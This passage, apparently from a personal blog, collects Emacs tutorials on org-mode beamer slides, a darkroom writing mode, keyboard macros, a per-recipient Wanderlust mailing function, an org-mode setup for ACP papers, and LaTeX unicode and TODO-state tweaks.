   False), # better keep this, too, I think.
]

Then call sphinx and install the info files like this (maybe adapted to your local setup):

sphinx-build -b texinfo source/ texinfo/ 
cd texinfo
sudo install-info --info-dir=/usr/share/info TARGETNAME.info
sudo cp TARGETNAME.info /usr/share/info/

Activate pydoc-info, including your documentation

Finally add the following to your .emacs (or wherever you store your personal adaptions):

; Show python-documentation as info-pages via C-h S
(setq load-path (cons "~/.emacs.d/libs/pydoc-info" load-path))
(require 'pydoc-info)
(info-lookup-add-help
   :mode 'python-mode
   :parse-rule 'pydoc-info-python-symbol-at-point
   :doc-spec
   '(("(python)Index" pydoc-info-lookup-transform-entry)
     ("(TARGETNAME)Index" pydoc-info-lookup-transform-entry)))

Attachments:
emacs-pydoc.png (52 KB)
emacs-pydoc-standardlibrary.png (34.22 KB)

Recipes for presentations with beamer latex using emacs org-mode

I wrote some recipes for creating the kinds of slides I need with emacs org-mode export to beamer latex.

Update: Read ox-beamer to see how to adapt this to work with the new export engine in org-mode 0.8.

The recipes as PDF (21 slides, 247 KiB)

The org-mode sources (12.2 KiB)

Below is an html export of the org-mode file. Naturally it does not look as impressive as the real slides, but it captures all the sources, so I think it has some value.

Note: To be able to use the simple block-creation commands, you need to add #+startup: beamer to the header of your file or explicitly activate org-beamer with M-x org-beamer-mode.

«I love your presentation»:

PS: I hereby allow use of these slides under any of the licenses used by worg and/or the emacs wiki.

1 Introduction

1.1 Usage

1.1.1 (configure your emacs, see Basic Configuration at the end)

1.1.2 C-x C-f <file which ends in .org>

1.1.3 Insert heading:

Hello World

#+LaTeX_CLASS: beamer
#+BEAMER_FRAME_LEVEL: 2

* Hello
** Hello GNU
Nice to see you!

1.1.4 M-x org-export-as-pdf

done: Your first org-beamer presentation.

1.2 org-mode + beamer = love

1.2.1 Code    BMCOL

Recipes
#+LaTeX_CLASS: beamer
#+BEAMER_FRAME_LEVEL: 2
* Introduction
** org-mode + beamer =  love
*** Code :BMCOL:
    :PROPERTIES:
    :BEAMER_col: 0.7
    :END:
<example block>
*** Simple block  :BMCOL:B_block:
    :PROPERTIES:
    :BEAMER_col: 0.3
    :BEAMER_env: block
    :END:
it's that easy!

1.2.2 Simple block    BMCOL B_block

it's that easy!

1.3 Two columns - in commands

1.3.1 Commands    BMCOL B_block

** Two columns - in commands
*** Commands
C-c C-b | 0.7
C-c C-b b
C-n
<eTAB (write example) C-n C-n
*** Result
C-c C-b | 0.3
C-c C-b b
even easier - and faster!

1.3.2 Result    BMCOL B_block

even easier - and faster!

2 Recipes

2.1 Four blocks - code

*** Column 1 :B_ignoreheading:BMCOL:
    :PROPERTIES:
    :BEAMER_env: ignoreheading
    :BEAMER_col: 0.5
    :END:

*** One
*** Three                                                           

*** Column 2 :BMCOL:B_ignoreheading:
    :PROPERTIES:
    :BEAMER_col: 0.5
    :BEAMER_env: ignoreheading
    :END:

*** Two
*** Four

2.2 Four blocks - result

2.2.1 Column 1    B_ignoreheading BMCOL

2.2.2 One

2.2.3 Three

2.2.4 Column 2    BMCOL B_ignoreheading

2.2.5 Two

2.2.6 Four

2.3 Four nice blocks - commands

*** 
C-c C-b | 0.5 # column
C-c C-b i # ignore heading
*** One 
C-c C-b b # block
*** Three 
C-c C-b b
*** 
C-c C-b | 0.5
C-c C-b i
*** Two 
C-c C-b b
*** Four 
C-c C-b b

2.4 Four nice blocks - result

2.4.1    BMCOL B_ignoreheading

2.4.2 One    B_block

2.4.3 Three    B_block

2.4.4    BMCOL B_ignoreheading

2.4.5 Two    B_block

2.4.6 Four    B_block

2.5 Top-aligned blocks

2.5.1 Code    B_block BMCOL

*** Code                                                      :B_block:BMCOL:
    :PROPERTIES:
    :BEAMER_env: block
    :BEAMER_col: 0.5
    :BEAMER_envargs: C[t]
    :END:

*** Result                                                    :B_block:BMCOL:
    :PROPERTIES:
    :BEAMER_env: block
    :BEAMER_col: 0.5
    :END:
pretty nice!

2.5.2 Result    B_block BMCOL

pretty nice!

2.6 Two columns with text underneath - code

2.6.1    B_columns

  • Code    BMCOL

    \tiny

    ***  :B_columns:
        :PROPERTIES:
        :BEAMER_env: columns
        :END:
    
    **** Code :BMCOL:
        :PROPERTIES:
        :BEAMER_col: 0.6
        :END:
    
    **** Result :BMCOL:
        :PROPERTIES:
        :BEAMER_col: 0.4
        :END:
    
    *** Underneath :B_ignoreheading:
        :PROPERTIES:
        :BEAMER_env: ignoreheading
        :END:
    Much text underneath! Very Much.
    Maybe too much. The whole width!
    

    \normalsize


  • Result    BMCOL

2.6.2 Underneath    B_ignoreheading

Much text underneath! Very Much. Maybe too much. The whole width!

2.7 Nice quotes

2.7.1 Code    B_block BMCOL

#+begin_quote
Emacs org-mode is a 
great presentation tool - 
Fast to beautiful slides.
- Arne Babenhauserheide
#+end_quote

2.7.2 Result    B_block BMCOL

Emacs org-mode is a great presentation tool - Fast to beautiful slides.

  • Arne Babenhauserheide

2.8 Math snippet

2.8.1 Code    BMCOL B_block

2.8.2 Inline    B_block

\( 1 + 2 = 3 \) is clear

2.8.3 As equation    B_block

\[ 1 + 2 \cdot 3 = 7 \]

2.8.4 Result    BMCOL B_block

2.8.5 Inline    B_block

\( 1 + 2 = 3 \) is clear

2.8.6 As equation    B_block

\[ 1 + 2 \cdot 3 = 7 \]

2.9 \( \LaTeX \)

2.9.1 Code    BMCOL B_block

\( \LaTeX \) gives a space 
after math mode.

\LaTeX{} does it, too.

\LaTeX does not.

At the end of a sentence 
both work.
Try \LaTeX. Or try \LaTeX{}.

Only \( \LaTeX \) and \( \LaTeX{} \) 
also work with HTML export.

2.9.2 Result    BMCOL B_block

\( \LaTeX \) gives a space after math mode.

\LaTeX{} does it, too.

\LaTeX does not.

At the end of a sentence both work. Try \LaTeX. Or try \LaTeX{}.

Only \( \LaTeX \) and \( \LaTeX{} \) also work with HTML export.

2.10 Images with caption and label

2.10.1    B_columns

  • Code    B_block BMCOL
    #+caption: GNU Emacs icon
    #+label: fig:emacs-icon
    [[/usr/share/icons/hicolor/128x128/apps/emacs.png]]
    
    This is image (\ref{fig:emacs-icon})
    

  • Result    B_block BMCOL

    file:///usr/share/icons/hicolor/128x128/apps/emacs.png

    GNU Emacs icon

    This is image (emacs-icon)


2.10.2    B_ignoreheading

Autoscaled to the block width!

2.11 Examples

2.11.1 Code    BMCOL B_block

: #+bla: foo
: * Example Header

Gives an example, which does not interfere with regular org-mode parsing.

#+begin_example
content
#+end_example

Gives a simpler multiline example which can interfere.

2.11.2 Result    BMCOL B_block

#+bla: foo
* Example Header

Gives an example, which does not interfere with regular org-mode parsing.

content

Gives a simpler multiline example which can interfere.

3 Basic Configuration

3.1 Header

<Title>

#+startup: beamer
#+LaTeX_CLASS: beamer
#+LaTeX_CLASS_OPTIONS: [bigger]
#+AUTHOR: <empty for none, if missing: inferred>
#+DATE: <empty for none, if missing: today>
#+BEAMER_FRAME_LEVEL: 2
#+TITLE: <causes <Title> to be regular content!>

3.2 .emacs config

Put these lines into your .emacs or in a file your .emacs pulls in - i.e. via (require 'mysettings) if the other file is named mysettings.el and ends in (provide 'mysettings).

(org-babel-do-load-languages ; babel, for executing 
 'org-babel-load-languages   ; code in org-mode.
 '((sh . t)
   (emacs-lisp . t)))

(require 'org-latex) ; latex export 
(add-to-list         ; with highlighting
  'org-export-latex-packages-alist '("" "minted"))
(add-to-list 
  'org-export-latex-packages-alist '("" "color"))
(setq org-export-latex-listings 'minted)

3.3 .emacs variables

You can easily set these via M-x customize-variable.

(custom-set-variables ; in ~/.emacs, only one instance 
 '(org-export-latex-classes (quote ; in the init file!
    (("beamer" "\\documentclass{beamer}" 
        org-beamer-sectioning))))
 '(org-latex-to-pdf-process (quote 
    ((concat "pdflatex -interaction nonstopmode " 
             "-shell-escape -output-directory %o %f") 
     "bibtex $(basename %b)" 
     (concat "pdflatex -interaction nonstopmode " 
             "-shell-escape -output-directory %o %f")
     (concat "pdflatex -interaction nonstopmode " 
             "-shell-escape -output-directory %o %f")))))

(concat "…" "…") is used here to get nice, short lines. Use the concatenated string instead ("pdflatex…%f").

3.4 Required programs

3.4.1 Emacs - (gnu.org/software/emacs)

To get org-mode and edit .org files effortlessly.

emerge emacs

3.4.2 Beamer \( \LaTeX \) - (bitbucket.org/rivanvx/beamer)

To create the presentation.

emerge dev-tex/latex-beamer app-text/texlive

3.4.3 Pygments - (pygments.org)

To color the source code (with minted).

emerge dev-python/pygments

4 Thanks and license

4.1 Thanks

Thanks go to the writers of emacs and org-mode, and for this guide in particular to the authors of the org-beamer tutorial on worg.

Thank you for your great work!

This presentation is licensed under the GPL (v3 or later) with the additional permission to distribute it without the sources and the copy of the GPL if you give a link to those.1

Footnotes:

1 : \tiny As additional permission under GNU GPL version 3 section 7, you may distribute these works without the copy of the GNU GPL normally required by section 4, provided you include a license notice and a URL through which recipients can access the Corresponding Source and the copy of the GNU GPL.\normalsize

Attachments:
emacs-org-beamer-recipes-thumnail.png (8.92 KB)
emacs-org-beamer-recipes-thumnail-org.png (20.61 KB)
2012-08-08-Mi-recipes-for-beamer-latex-presentation-using-emacs-org-mode.pdf (247.11 KB)
2012-08-08-Mi-recipes-for-beamer-latex-presentation-using-emacs-org-mode.org (12.18 KB)

Sending email to many people with Emacs Wanderlust

I recently needed to send an email to many people1.

Putting all of them into the BCC field did not work (mail rejected by provider) and when I split it into 2 emails, many did not see my mail because it was flagged as potential spam (they were not in the To-Field)2.

I did not want to put them all into the To-Field, because that would have spread their email-addresses around, which many would not want3.

So I needed a different solution. Which I found in the extensibility of emacs and wanderlust4. It now carries the name wl-draft-send-to-multiple-receivers-from-buffer.

You simply write the email as usual via wl-draft, then put all email addresses you want to write to into a buffer and call M-x wl-draft-send-to-multiple-receivers-from-buffer. It asks you about the buffer with email addresses, then shows you all addresses and asks for confirmation.

Then it sends one email after the other, with a randomized wait of 0-10 seconds between messages to avoid flagging as spam.

If you want to use it, just add the following to your .emacs:

(defun wl-draft-clean-mail-address (address)
  (replace-regexp-in-string "," "" address))
(defun wl-draft-send-to-multiple-receivers (addresses)
  (loop for address in addresses
        do (progn
             (wl-user-agent-insert-header "To" (wl-draft-clean-mail-address address))
             (let ((wl-interactive-send nil))
               (wl-draft-send))
             (sleep-for (random 10)))))
(defun wl-draft-send-to-multiple-receivers-from-buffer (&optional addresses-buffer-name)
  "Send a mail to multiple recipients - one recipient at a time"
  (interactive "BBuffer with one address per line")
  (let ((addresses nil))
    (with-current-buffer addresses-buffer-name
      (setq addresses (split-string (buffer-string) "\n")))
    (if (y-or-n-p (concat "Send this mail to " (mapconcat 'identity addresses ", ")))
        (wl-draft-send-to-multiple-receivers addresses))))

Happy Hacking!


  1. The email was about the birth of my second child, and I wanted to inform all people I care about (of whom I have the email address), which amounted to 220 recipients. 

  2. Naturally this technique could be used for real spamming, but to be frank: People who send spam won’t need it. They will already have much more sophisticated methods. This little trick just reduces the inconvenience brought upon us by the measures which are necessary due to spam. Otherwise I could just send a mail with 1000 receivers in the BCC field - which is how it should be. 

  3. It only needs one careless friend, and your connections to others get tracked in facebook and the likes. For more information on Facebook, see Stallman about Facebook

  4. Sure, there are also template mails and all such, but learning to use these would consume just as much time as extending emacs - and would be much less flexible: Should I need other ways to transform my mails, I’ll be able to just reuse my code. 

Simple Emacs DarkRoom

I just realized that I let myself be distracted by all kinds of not-so-useful stuff instead of finally getting to type the text I already wanted to transcribe from stenographic notes at the beginning of … last week.

Screenshot!

Let’s take a break for a screenshot of the final version, because that’s what we really want to gain from this article: a distraction-free screenshot as distraction from the text :)

Emacs darkroom, screenshot

As you can see, the distractions are removed — the screenshot is completely full screen and only the text is left. If you switch to the minibuffer (i.e. via M-x), the status bar (modeline) is shown.

Background

To remove the distractions I looked again at WriteRoom and DarkRoom and similar tools which show just the text I want to write. More exactly: I thought about looking at them again, but on second thought I decided to see if I could not just customize emacs to do the same, backed with all the power you get from several decades of being THE editor for many great hackers.

It took some googling and reading emacs wiki, and then some Lisp-hacking, but finally it’s 4 o’clock in the morning and I’m writing this in my own darkroom mode1, toggled on and off by just hitting F11.

Implementation

I build on hide-mode-line (livejournal post or webonastick) as well as the full-screen info in the emacs wiki.

The whole code just takes 76 lines of code plus 26 lines of comments and whitespace:

;;;; Activate distraction free editing with F11

; hide mode line, from http://dse.livejournal.com/66834.html / http://webonastick.com
(autoload 'hide-mode-line "hide-mode-line" nil t)
; word counting
(require 'wc)

(defun count-words-and-characters-buffer ()
  "Display the number of words and characters in the current buffer."
  (interactive)
  (message (concat "The current buffer contains "
           (number-to-string
            (wc-non-interactive (point-min) (point-max)))
           " words and "
           (number-to-string 
            (- (point-max) (point-min)))
           " letters.")))

; fullscreen, taken from http://www.emacswiki.org/emacs/FullScreen#toc26
; should work for X and OSX with emacs 23.x (TODO find minimum version).
; for windows it uses (w32-send-sys-command #xf030) (#xf030 == 61488)
(defvar babcore-fullscreen-p t "Check if fullscreen is on or off")
(setq babcore-stored-frame-width nil)
(setq babcore-stored-frame-height nil)

(defun babcore-non-fullscreen ()
  (interactive)
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND restore #xf120
      (w32-send-sys-command 61728)
    (progn (set-frame-parameter nil 'width 
                                (if babcore-stored-frame-width
                                    babcore-stored-frame-width 82))
           (set-frame-parameter nil 'height
                                (if babcore-stored-frame-height 
                                    babcore-stored-frame-height 42))
           (set-frame-parameter nil 'fullscreen nil))))

(defun babcore-fullscreen ()
  (interactive)
  (setq babcore-stored-frame-width (frame-width))
  (setq babcore-stored-frame-height (frame-height))
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND maximize #xf030
      (w32-send-sys-command 61488)
    (set-frame-parameter nil 'fullscreen 'fullboth)))

(defun toggle-fullscreen ()
  (interactive)
  (setq babcore-fullscreen-p (not babcore-fullscreen-p))
  (if babcore-fullscreen-p
      (babcore-non-fullscreen)
    (babcore-fullscreen)))

(global-set-key [f11] 'toggle-fullscreen)

; simple darkroom with fullscreen, fringe, mode-line, menu-bar and scroll-bar hiding.
(defvar darkroom-enabled nil)
; TODO: Find out if menu bar is enabled when entering darkroom. If yes: reenable.
(defvar darkroom-menu-bar-enabled nil)

(defun toggle-darkroom ()
  (interactive)
  (if (not darkroom-enabled)
      (setq darkroom-enabled t)
    (setq darkroom-enabled nil))
  (hide-mode-line)
  (if darkroom-enabled
      (progn
        (toggle-fullscreen)
        ; if the menu bar was enabled, reenable it when disabling darkroom
        (if menu-bar-mode
            (setq darkroom-menu-bar-enabled t)
          (setq darkroom-menu-bar-enabled nil))
        ; save the frame configuration to be able to restore to the exact previous state.
        (if darkroom-menu-bar-enabled
            (menu-bar-mode -1))
        (scroll-bar-mode -1)
        (let ((fringe-width 
               (* (window-width (get-largest-window)) 
                  (/ (- 1 0.61803) (1+ (count-windows)))))
              (char-width-pixels 6))
        ; 8 pixels is the default, 6 is the average char width in pixels
        ; for some fonts:
        ; http://www.gnu.org/software/emacs/manual/html_node/emacs/Fonts.html
           (set-fringe-mode (truncate (* fringe-width char-width-pixels))))
    
        (add-hook 'after-save-hook 'count-words-and-characters-buffer))
    
    (progn 
      (if darkroom-menu-bar-enabled
          (menu-bar-mode))
      (scroll-bar-mode t)
      (set-fringe-mode nil)
      (remove-hook 'after-save-hook 'count-words-and-characters-buffer)
      (toggle-fullscreen))))

; Activate with M-F11 -> enhanced fullscreen :)
(global-set-key [M-f11] 'toggle-darkroom)

(provide 'activate-darkroom)

Also I now activated cua-mode to make it easier to interact with other programs: C-c and C-x now copy/cut when the mark is active. Otherwise they are the usual prefix keys. To force them to be the prefix keys, I can use control-shift-c/-x. I thought this would disturb me, but it does not.

To make it faster, I also told cua-mode to have a maximum delay of 0.005 seconds, so I don’t feel the delay. Essentially I just put this in my ~/.emacs:

(cua-mode t)
(setq cua-prefix-override-inhibit-delay 0.005)

Epilog

Well, did this get me to transcribe the text? Not really, since I spent the time building my own DarkRoom/WriteRoom, but I enjoyed the little hacking and it might help me get it done tomorrow - and get far more other stuff done.

And it is really fun to write in DarkRoom mode ;)

PS: If you like the simple darkroom, please leave a comment!

I hereby declare that anyone is allowed to use this post and the screenshot under the same licensing as if it had been written in emacswiki.


  1. Actually there already is a darkroom mode, but it only works for windows. If you use that platform, you might enjoy it anyway. So you might want to call this mode “simple darkroom”, or darkroom x11 :) 

Attachment: 2011-01-22-emacs-darkroom.png (97.37 KB)

Staying sane with Emacs (when facing drudge work)

I have to sift through 6 really boring config files. To stay sane, I call in Emacs for support.

My task looks like this:

(screenshot of the task)

In the lower left window I check the identifier in the table I have to complete (left column), then I search for all instances of that identifier in the right window and insert the instrument type, the SIGMA (uncertainty due to representation error defined for the type of the instrument and the location of the site) and note whether the site is marked as assimilated in the config file.

Then I also check all the other config files and note whether the site is assimilated there.

Drudge work. There are people who can do this kind of work. My wife would likely be able to do it faster without tool support than I can do it with tool support. But I’m really bad at that: When the task gets too boring I tend to get distracted - for example by writing this article.

To get the task done anyway, I create tools which make it more enjoyable. And with Emacs that’s actually quite easy, because Emacs provides most required tools out of the box.

First off: My workflow before adding tools was like this:

  • hit C-x o to switch from the lower left window to the config file at the right.
  • Use M-x occur then type the station identifier. This displays all occurrences of the station identifier within the config file in the upper left window.
  • Hit C-x o twice to switch to the lower left window again.
  • Type the information into the file.
  • Switch to the next line and repeat the process.

I now want to simplify this to a single command per line. I’ll use F9 as the key, because it isn’t yet used for other things in my Emacs setup, because it is easy to reach, and because it is my default keybinding for a “useful shortcut for this file”. Other single-keystroke options would be F7 and F8. All other F-keys are already used :)

To make this easy, I define a macro:

  • Move to the line above the line I want to edit.
  • Start Macro-recording with C-x C-(.
  • Go to the beginning of the next line with C-n and C-a.
  • Activate the mark with C-SPACE and select the whole identifier with M-f.
  • Make the identifier lowercase with M-x downcase-region, copy it with M-w and undo the downcasing with C-x u (or use the undo key; I defined one in my xmodmap).
  • Switch to the config file with C-x o
  • Search the buffer with M-x occur, inserting the identifier with C-y.
  • Hit C-x o C-x o (yes, twice) to get back into the list of sites.
  • Move to the end of the instrument column with M-f and kill the word with C-BACKSPACE.
  • Save the macro with C-x C-).
  • Bind kmacro-call-macro to F9 with M-x local-set-key F9 kmacro-call-macro (the Lisp equivalent is shown below).

Done.
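
For reference, the Lisp equivalent of that last binding step would be (a sketch):

; bind the last recorded keyboard macro to F9 in the local keymap
(local-set-key (kbd "<f9>") 'kmacro-call-macro)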

My workflow is now reduced to this:

  • Hit F9
  • Type the information.
  • Repeat.

I’m pretty sure that this will save me more time today than I spent writing this text ☺

Happy hacking!

Attachments:
2015-01-26-sane-with-emacs-task.png (79.85 KB)
2015-01-26-sane-with-emacs-task-200.png (7.79 KB)
2015-01-26-sane-with-emacs-task-300.png (15.92 KB)
2015-01-26-sane-with-emacs-task-400.png (27.28 KB)
2015-01-26-sane-with-emacs-task-450.png (33.83 KB)

Tutorial: Writing scientific papers for ACP using emacs org-mode

Update 2023: I no longer work at the University. Nowadays I would use this setup as a starting point, but with more focus on using org for reproducibility (I have German instructions for that); when the first version is ready for submission, I would export it as LaTeX and work directly on that, because you’ll need detailed changes in LaTeX.

PDF-version (for printing)

orgmode-version (for editing)

Emacs Org mode is an excellent tool for reproducible research,1 but research is only relevant if people learn about it.2 To reach people with scientific work, you need to publish your results in a Journal, so I show here how to publish in ACP with Emacs Org mode.3

1 Requirements

To use this tutorial, you need

  • a fairly recent version of org-mode (8.0 or later - not yet shipped with emacs 24.3, so you will need to install it separately) and naturally
  • Emacs. Also you need to download the
  • copernicus latex package. And it can’t hurt to have a look at the latex-instructions from ACP. I used them to create my setup.
  • lineno.sty. This is required by copernicus, but not included in the package - and neither in the texlive version I use.

2 Basic Setup

2.1 Emacs

The first step in publishing to ACPD is to activate org-mode and latex export and to create a latex-class in Emacs. To do so, just add the following to your ~/.emacs (or ~/.emacs.d/init.el) and eval it (for example by moving to the closing parenthesis and typing C-x C-e):

  (require 'org)
  (require 'org-latex)
  (require 'ox-latex)
  (setq org-latex-packages-alist 
        (quote (("" "color" t) ("" "minted" t) ("" "parskip" t)))
        org-latex-pdf-process 
        (quote (
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f" 
"bibtex $(basename %b)" 
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f" 
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f")))
  (add-to-list 'org-latex-classes
               `("copernicus_discussions"
                 "\\documentclass{copernicus_discussions}
               [NO-DEFAULT-PACKAGES]
               [PACKAGES]
               [EXTRA]"
                 ("\\section{%s}" . "\\section*{%s}")
                 ("\\subsection{%s}" "\\newpage" "\\subsection*{%s}" "\\newpage")
                 ("\\subsubsection{%s}" . "\\subsubsection*{%s}")
                 ("\\paragraph{%s}" . "\\paragraph*{%s}")
                 ("\\subparagraph{%s}" . "\\subparagraph*{%s}"))
               )

This allows you to use #+Latex_Class: copernicus_discussions in your org-mode file to set the PDF to export for ACPD.

Also you will likely want to use reftex for nice bibtex integration. To get it, add the following to your ~/.emacs or ~/.emacs.d/init.el:

(require 'reftex-cite)
(defun org-mode-reftex-setup ()
  (interactive)
  (and (buffer-file-name) (file-exists-p (buffer-file-name))
       (progn
        ; Reftex should use the org file as master file. See C-h v TeX-master for infos.
        (setq TeX-master t)
        (turn-on-reftex)
        ; enable auto-revert-mode to update reftex when bibtex file changes on disk
        (global-auto-revert-mode t) ; careful: this can kill the undo
                                    ; history when you change the file
                                    ; on-disk.
        (reftex-parse-all)
        ; add a custom reftex cite format to insert links
        ; This also changes any call to org-citation!
        (reftex-set-cite-format
         '((?c . "\\citet{%l}") ; natbib inline text
           (?i . "\\citep{%l}") ; natbib with parens
           ))))
  (define-key org-mode-map (kbd "C-c )") 'reftex-citation)
  (define-key org-mode-map (kbd "C-c (") 'org-mode-reftex-search))

(add-hook 'org-mode-hook 'org-mode-reftex-setup)

This adds reftex-citations with C-c [ (the code above also binds reftex-citation to C-c ) in org-mode), the rest sets some reftex-defaults and adds a menu which allows you to choose \citep{} instead of \cite{} (this is what ACPD requires).

For nice source code highlighting, you should also install Pygmentize and then add the following to your .emacs (or ~/.emacs.d/init.el):

(add-to-list 'org-latex-packages-alist '("" "minted"))
(add-to-list 'org-latex-packages-alist '("" "color"))
(setq org-latex-listings 'minted)

; add emacs lisp support for minted
(setq org-latex-custom-lang-environments
      '((emacs-lisp "common-lispcode")))

2.2 The working folder

As next step, unzip the copernicus latex package in the folder you want to use for writing your article (do use a dedicated folder for that: org-mode leaves around some files). And remember to use a version-tracking system like Mercurial, so you can always take snapshots of your current state.

This will give you the following files:

  • authblk.sty
  • copernicus.bst
  • copernicus_discussions.cls
  • natbib.sty
  • pdfscreen.sty
  • pdfscreencop.sty

Ensure that all of them are in your folder, not in a subfolder. If necessary copy them there.

Also get lineno.sty and copy it into your folder.

If you want to use unicode-symbols in your text, add uniinput.sty, too.

3 The org-mode document

Using the ACPD style requires some deviations from the standard org-mode export process. Luckily org-mode is flexible enough to adapt to them. Set up your document as follows:

#+title: YOUR TITLE
#+Options: toc:nil ^:nil
#+BIND: org-latex-title-command ""
#+Latex_Class: copernicus_discussions
#+LaTeX_CLASS_OPTIONS: [acpd, hvmath, online]

# Nice code-blocks
#+BEGIN_SRC elisp :noweb no-export :exports results
  (setq org-latex-minted-options
    '(("bgcolor" "mintedbg") ("frame" "single") ("framesep" "6pt") 
      ("mathescape" "true") ("fontsize" "\\footnotesize")))
  nil
#+END_SRC

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+TOC: headlines 2

#+Latex: \runningtitle{SHORT TITLE}
#+Latex: \runningauthor{SHORT AUTHOR}
#+Latex: \correspondence{AUTHOR NAME\\ EMAIL}
#+Latex: \affil{YOUR UNIVERSITY}
#+Latex: \author[2,*]{SECOND AUTHOR}
#+Latex: \author[1]{THIRD AUTHOR SAME INSTITUTE}
#+Latex: \affil[2]{SECOND UNIVERSITY}
#+Latex: \affil[*]{now at: THIRD UNIVERSITY}

#+Latex: \received{}
#+Latex: \pubdiscuss{}
#+Latex: \revised{}
#+Latex: \accepted{}
#+Latex: \published{}
#+Latex: %% These dates will be inserted by ACPD
#+Latex: \firstpage{1}

#+Latex: \maketitle

#+Latex: \introduction
# * Introduction

* Second section

* Discussion

#+Latex: \conclusions
# * Conclusions

#+Latex: \appendix

# use acknowledgements for multiple
#+BEGIN_acknowledgement
Foo Bar Baz.
#+END_acknowledgement

#+Latex: \bibliographystyle{copernicus}
#+Latex: \bibliography{ABSOLUTE_PATH_TO_YOUR_BIBTEX_FILE_WITHOUT_.bib_SUFFIX}{}

# Local Variables:
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:

Let’s look at this in more detail.

3.1 Use the LaTeX class

As a first step, we set the LaTeX class. In the options we select the journal (acpd) and such - you can find the detailed options in the latex-instructions from ACP.

#+Latex_Class: copernicus_discussions
#+LaTeX_CLASS_OPTIONS: [acpd, hvmath, online]

3.2 Delayed table of contents

The table of contents is set to be shown after the Abstract by setting the toc:nil option and later explicitly calling #+TOC: headlines 2. In org-mode this is really straightforward.

3.3 Delayed maketitle

Delaying \maketitle is a bit more convoluted than delaying the TOC. First we add the local variable org-export-allow-bind-keywords: t at the bottom to allow file-local custom bindings for functions in the file, then we deactivate the title-command with #+BIND: org-latex-title-command "" and finally we add \maketitle where we need it.

3.4 Define minted style

This defines the variables minted uses for beautiful code-blocks. Without this, your code-blocks will just look like inline text.

#+BEGIN_SRC elisp :noweb no-export :exports results
  (setq org-latex-minted-options
    '(("bgcolor" "mintedbg") ("frame" "single") ("framesep" "6pt") 
      ("mathescape" "true") ("fontsize" "\\footnotesize")))
  nil
#+END_SRC

3.5 Intro and conclusions

The Introduction and the conclusions have their own commands in ACPD, because they use them to add bookmarks. You can also use the commands to specify another name.

We call the commands with #+LaTeX: (just like some others), which allows us to explicitly add arbitrary LaTeX-code.

3.6 Appendix

The appendix should be used sparingly. It changes the numbering of the pages.

#+Latex: \appendix

3.7 Bibliography

The bibliography allows referring to entries from your general bibtex-file. Ensure that you use the correct absolute path to that file. For more information, see the org-tutorial page for biblatex.

3.8 Babel evaluate without confirmation

This allows us to just run all code snippets which we embedded in the document when we export the file. If we do not set this local variable, we have to acknowledge each source block before it runs (the block with local variables also contains the variable which allows binding functions on a per-file basis, as explained above).

# Local Variables:
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:

4 Conclusion

With this setup, you can publish your paper with ACPD using org-mode for the actual writing, which has a much lower overhead than LaTeX and offers quite a few unique features for more efficient working - from easy referencing over inline math preview to planning and code-evaluation directly in your file.

Footnotes:

1

General methods for using Emacs org-mode in scientific publishing have been described by \citet{SchulteEmacs2012}.

2

Research, or rather science not only means to learn new things and to uncover secrets, but just as importantly to share what you learn. Fun fact: The German word for science is “Wissenschaft”, built from the words “wissen” (knowledge) and “schaft” (from schaffen: create), so it more exactly captures the essence of scientific work than the word “science”, that is based on the latin word “scientia” which just means knowledge. It isn’t enough to just learn. Creating knowledge requires telling it to others, so they can build upon it.

3

I chose ACPD as target for this article, because it is an Open Access journal, and because I want to publish in it (which makes it a rather natural choice for a tutorial).

Unicode char \u8:χ not set up for use with LaTeX: Solution (made easy with Emacs)

For years I regularly stumbled over LaTeX-Errors of the form Unicode char \u8:χ not set up for use with LaTeX. I always took the chicken’s path and replaced the unicode characters with the tex-escapes in the file. That was easy, but it made my files needlessly unreadable. Today I decided to FIX the problem once and for all. And it worked. Easily.

First off: The problem I’m facing is that my keyboard layout makes it effortless for me to input characters like ℂ Σ and χ. But LaTeX cannot cope with them out-of-the-box. Org-mode already catches most of these problems, so I can write things like x² instead of x^2, but occasionally it stumbles.

The solution to that is actually pretty simple: I only need to declare the escape-sequences LaTeX should use when it sees one of the characters (to be used before \begin{document}!):

\DeclareUnicodeCharacter{03C7}{\chi}

Or in org-mode:

#+LaTeX_HEADER: \DeclareUnicodeCharacter{03C7}{\chi}

To do this more easily, you can use the uniinput.ins and uniinput.dtx from the neo-layout project. Run latex uniinput.ins to generate uniinput.sty which you can put next to your latex files and use with \usepackage{uniinput} (instructions in German).

Thanks go to Wikibooks:LaTeX for this. Their solution then suggests reading several Unicode definition documents to track down the codepoint of the character. But we can make that easier with Emacs (almost everything is easier with Emacs ☺).

Instead of browsing huge documents manually, we simply rely on the unicode-definitions in Emacs: Move the cursor over the char and execute M-x describe-char.

When used with χ, this shows the following output:

             position: 672 of 35513 (2%), column: 0
            character: χ (displayed as χ) (codepoint 967, #o1707, #x3c7)
    preferred charset: unicode-bmp (Unicode Basic Multilingual Plane (U+0000..U+FFFF))
code point in charset: 0x03C7
… (and a bit more) …

What we need is code point in charset: Just leave out the 0x and you have the codepoint.

For the document I currently write, I now use the following definitions:

#+LaTeX_HEADER: \DeclareUnicodeCharacter{03C7}{\chi}
#+LaTeX_HEADER: \DeclareUnicodeCharacter{B2}{^{2}}

And that makes χ² work.

Happy Hacking - and have fun with Emacs Org-Mode!

Unicode-Characters for TODO-States in Emacs Orgmode

By default Emacs Orgmode uses uppercase words for todo keywords. But having tens of entries marked with TODO and DONE in my file looked horribly cluttered to me. So I searched for alternatives. After a few months of experimentation, I decided on the following scheme. It has served me well ever since:

  • ❢ To do
  • ☯ In progress
    • ⚙ A program is running (optional detail)
    • ✍ I’m writing (optional detail)
  • ⧖ Waiting
  • ☺ To report
  • ✔ Done
  • ⌚ Maybe do this at some later time
  • ✘ Won’t do

To set this in org-mode, just add the following to the header (and reopen the document, for example with C-x C-v):

#+SEQ_TODO: ❢ ☯ ⧖ | ☺ ✔ ⌚ ✘

or for the complex case (with details on what I do)

#+SEQ_TODO: ❢ ☯ ⚙ ✍ ⧖ | ☺ ✔ ⌚ ✘

Then use C-c C-t or SHIFT-→ (shift + right arrow) to switch to the next state or SHIFT-← (shift + left arrow) to switch to the previous state.

